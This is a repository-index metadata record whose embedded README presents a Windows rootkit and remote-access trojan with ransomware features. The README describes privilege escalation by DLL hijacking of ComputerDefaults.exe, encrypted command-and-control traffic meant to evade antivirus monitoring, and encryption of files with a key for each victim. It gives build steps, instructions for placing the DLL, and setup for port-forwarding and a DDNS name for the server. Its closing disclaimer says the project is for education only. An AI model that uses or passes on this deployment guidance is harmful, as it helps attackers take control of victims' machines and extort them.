{"id":23708515,"url":"https://github.com/provrb/react","last_synced_at":"2025-09-03T14:32:58.824Z","repository":{"id":255799010,"uuid":"853118124","full_name":"provrb/react","owner":"provrb","description":"Remote Elevation and Persistence Access Control Technique. User mode rootkit that takes advantage of System32 mock directory and DLL Hijacking. Created for education purposes and not to be distributed.","archived":false,"fork":false,"pushed_at":"2024-12-19T21:13:03.000Z","size":101401,"stargazers_count":3,"open_issues_count":2,"forks_count":2,"subscribers_count":1,"default_branch":"main","last_synced_at":"2024-12-19T22:32:54.231Z","etag":null,"topics":["dll","malware","rat","rootkit","trojan","virus","windows"],"latest_commit_sha":null,"homepage":"https://provrb.github.io/react/","language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/provrb.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-09-06T03:02:09.000Z","updated_at":"2024-12-19T21:13:06.000Z","dependencies_parsed_at":"2024-12-19T22:41:58.273Z","dependency_job_id":null,"html_url":"https://github.com/provrb/react","commit_stats":null,"previous_names":["provrb/logicgate","provrb/logicgate-rootkit","provrb/react"],"tags_count":1,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/provrb%2Freact","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/provrb%2Freact/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/provrb%2Freact/releases","manifests_url"
:"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/provrb%2Freact/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/provrb","download_url":"https://codeload.github.com/provrb/react/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":231895815,"owners_count":18442361,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["dll","malware","rat","rootkit","trojan","virus","windows"],"created_at":"2024-12-30T17:57:14.513Z","updated_at":"2024-12-30T17:57:21.001Z","avatar_url":"https://github.com/provrb.png","language":"C","readme":"# React (acronym)\n_This project has a write-up with it. View it [here](https://provrb.github.io/Logicgate-Rootkit/)_\n\nReact, Remote Elevation and Persistence Access Control Technique,\nis a user-mode RAT rootkit that elevates to Trusted Installer privileges by using DLL hijacking\nand a System32 mock directory. Requests over sockets to and from remote hosts are encrypted using RSA\nto hinder reverse engineering and anti-virus monitoring of network traffic. Commands can be sent from\nthe command-and-control server to remote hosts; these commands are performed on the client's machine.\n- Includes ransomware functionality. 
Encrypt files using uniquely generated 2048-bit RSA keys\nfor each client, and save them in a JSON file with the client machine GUID as the key index.\n    \n# Installing\nHow to install the source code for the project in a couple of different ways.\n\n### Using GitHub.com Website\nTo install the source using the GitHub website, simply visit the repository link (https://github.com/provrb/Logicgate-Rootkit)\nand click the green 'Code' button at the top of the page, then click 'Download ZIP'. Your download should start.\nOnce downloaded as a ZIP, unpack the folder 'Logicgate-Rootkit' to a spot on your computer. You now have \ndownloaded the source code for the project. \n\n### Using the Command Line\nTo install using the command line, first open your terminal or command prompt\nand navigate to a path somewhere on your computer where you would like to save the source code.\nAfterwards, simply clone the repository using this link: https://github.com/provrb/Logicgate-Rootkit.git \nYou can run the command below to do this.\n\n```\ngit clone https://github.com/provrb/Logicgate-Rootkit.git\n```\n\nFinally, the source code should be saved in a folder 'Logicgate-Rootkit' at the path \nyou were located at in your command prompt.\n\n# Building\nInstructions for building the client DLL and server executable with Visual Studio only.\n\n**Visual Studio is recommended when building. This application has only ever been built with Visual Studio.**\n\n### Using Visual Studio\nWith the source code for the project downloaded, open the 'DLL.sln' file.\nThis should load the project solution. 
Afterwards, choose your configuration,\neither 'Client' or 'Server', and then navigate to Build -\u003e Build Solution.\n\nIf you built the CLIENT configuration, the client DLL will be located in 'out/x64/Client/'.\nIf you built the SERVER configuration, the server executable will be located in 'out/x64/Server/'.\n\n# Running\nInstructions for running the client DLL and the server executable.\n\n### Client DLL\nSince the Client DLL is meant to be shipped alongside ComputerDefaults.exe,\nit is loaded by ComputerDefaults.exe.\n\nTake a copy of this executable at 'C:\\Windows\\System32\\ComputerDefaults.exe'.\nPlace this copy in the same directory as your Client DLL. **Do NOT rename this file, otherwise it won't be \nrecognized and loaded by the executable**.\nOnce the two are in the same directory, you can run ComputerDefaults.exe.\n\n### Server EXE\n**Important: You must port-forward the ports you create the server with in ServerMain.cpp**\n\nThe server is much simpler to run. As it is an executable, you can simply build it\nand run the Server.exe file. The TCP server will be created on your defined port, default 5454,\nand will also be listening for UDP messages on port 4820. 
\n\n# Configuration\nInstructions on configuring the server: settings such as the TCP port, the DDNS name to use, etc.\n**Important: To run the server, you must port-forward the ports defined in the creation of any server.**\n\nYou can configure server settings the TCP server will follow by modifying m_Config in ServerInterface.h.\nThe config will look something like\n\n```c++\nstruct {\n    std::string serverStatePath;\n    std::string serverStateFilename;\n    std::string serverStateFullPath;\n    std::string serverConfigPath;\n    std::string serverConfigFilename;\n    std::string serverConfigFilePath;\n    std::string domainName;\n    const UINT  maxConnections;\n    long        TCPPort;\n    long        UDPPort;\n    const UINT  keepAliveIntervalMs;\n    const UINT  keepAliveTimeoutMs;\n} m_Config;\n```\n\n### Config Values Meaning\n```\nserverStatePath:      The path to save the JSON file containing information about the server, created on startup, and used by the server.\nserverStateFilename:  The name of the JSON file to save server info.\nserverStateFullPath:  Do not modify unless you know what you are doing.\nserverConfigPath:     WIP. Reserved.\nserverConfigFilename: WIP. Reserved.\nserverConfigFilePath: Do not modify unless you know what you are doing.\ndomainName:           Reference to DNS_NAME in Client.h. Do not modify.\n                      - To modify, instead change the DNS_NAME variable in Client.h to\n                        your desired DNS. You can set a free DNS up with no-ip.com!\nmaxConnections:       The max number of connections the TCP server can have at once.\nTCPPort:              Read only. 
TCP port that you created the TCP server with.\n                      - You can customize the TCP port you run the server with\n                        by providing different arguments to the ServerInterface constructor\n                        in ServerMain.cpp!\nUDPPort:              Read only. UDP port that you are listening on and created the server with.\n                      - You can customize the UDP port you run the server with\n                        by providing different arguments to the ServerInterface constructor\n                        in ServerMain.cpp!\nkeepAliveIntervalMs:  How often to send keep-alive packets to your clients to prevent them from disconnecting.\nkeepAliveTimeoutMs:   The time to wait for a keep-alive packet to be echoed by the client before concluding the client is dead.\n```\n\n# Commands\nDescriptions of commands you can perform on remote hosts.\n\n# Ethical Concerns\nThis project was made to demonstrate privilege escalation, DLL hijacking, and remote access\ntechniques. \n\nWhile this project is released under the MIT license, executing or misusing\nthis Software can lead to severe legal consequences. This Software is intended solely for\neducational purposes, research, and was tested in secure, controlled environments. \n\nThe Software should **never** be used for malicious purposes. Deploying the Software on unauthorized\nsystems without consent is illegal and unethical. The author holds no responsibility\nfor any damages caused by the use of this Software on unauthorized systems, or in environments\nwhere explicit permission from the system owner has not been granted.\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fprovrb%2Freact","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fprovrb%2Freact","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fprovrb%2Freact/lists"}